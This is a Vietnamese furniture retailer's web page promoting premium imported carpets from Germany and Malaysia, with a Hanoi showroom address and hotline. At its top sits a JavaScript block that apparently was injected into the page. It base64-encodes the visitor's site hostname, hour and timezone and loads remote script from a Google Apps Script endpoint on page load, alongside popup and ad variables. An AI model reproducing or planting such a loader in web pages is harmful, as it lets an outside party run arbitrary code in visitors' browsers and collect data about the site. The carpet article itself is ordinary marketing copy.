var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Các loại thảm trải sàn cao cấp nên mua

Tham khảo thông tin về các loại thảm trải sàn cao cấp hiện nay trên thị trường giúp quý vị dễ dàng lựa chọn được sản phẩm thảm trang trí có chất lượng cao. Có thể đáp ứng nhu cầu của sử dụng gia đình mà lại sở hữu sản phẩm chất lượng cao.

Các loại thảm trải sàn cao cấp đáng mua nhất hiện nay

Do nhu cầu sử dụng thảm trang trí, thảm văn phòng cao cấp ngày càng tăng cao. Do đó trên thị trường hiện nay xuất hiện rất nhiều dòng sản phẩm khác nhau. Dưới đây là các loại thảm trải sàn cao cấp, chất lượng cao và có giá thành khá hợp lý dành cho quý vị tham khảo.

Thảm trải sàn nhập khẩu từ Đức

Các loại thảm trang trí nhập khẩu nguyên tấm từ Đức hiện đang là dòng sản phẩm có chất lượng cao và giá thành khá hợp lý hiện nay. Sản phẩm được sản xuất trên dây chuyển hiện đại, tiên tiến. Nhằm mang tới sản phẩm có chất lượng cao và có nhiều mẫu mã đẹp cho khách hàng lựa chọn.

Các loại thảm trải sàn cao cấp
Thảm trải sàn cao cấp nhập khẩu từ Đức

Thảm trải sàn Đức được ưa chuộng để kết hợp với những bộ bàn ghế sofa phòng khách đẹp hoặc sử dụng trong phòng ngủ master.

Thảm nhập khẩu Malaysia

Các mẫu thảm trang trí phòng khách nhập khẩu từ Malaysia hiện đang được ưa chuộng. Bởi sản phẩm cũng mang tới chất lượng cao, mang tới nhiều trải nghiệm thú vị dành cho người dùng. Đây là một trong các loại thảm trải sàn cao cấp quý vị không thể bỏ qua nếu như muốn mua thảm trang trí đẹp cho ngôi nhà.

Các loại thảm trải sàn cao cấp
Thảm trang trí nhập khẩu Malaysia

Hãy tới ngay siêu thị Nội Thất Xinh tại 321 Trường Chinh, Thanh Xuân, Hà Nội để tham khảo ngay những mẫu thảm đẹp, chất lượng cao được nhập khẩu nguyên tấm của chúng tôi. Hotline tư vấn chi tiết 0243 905 9999 – 0975 90 3333.

=> Xem thêm: Tư vấn chọn ghế sofa phòng giám đốc đẹp, sang trọng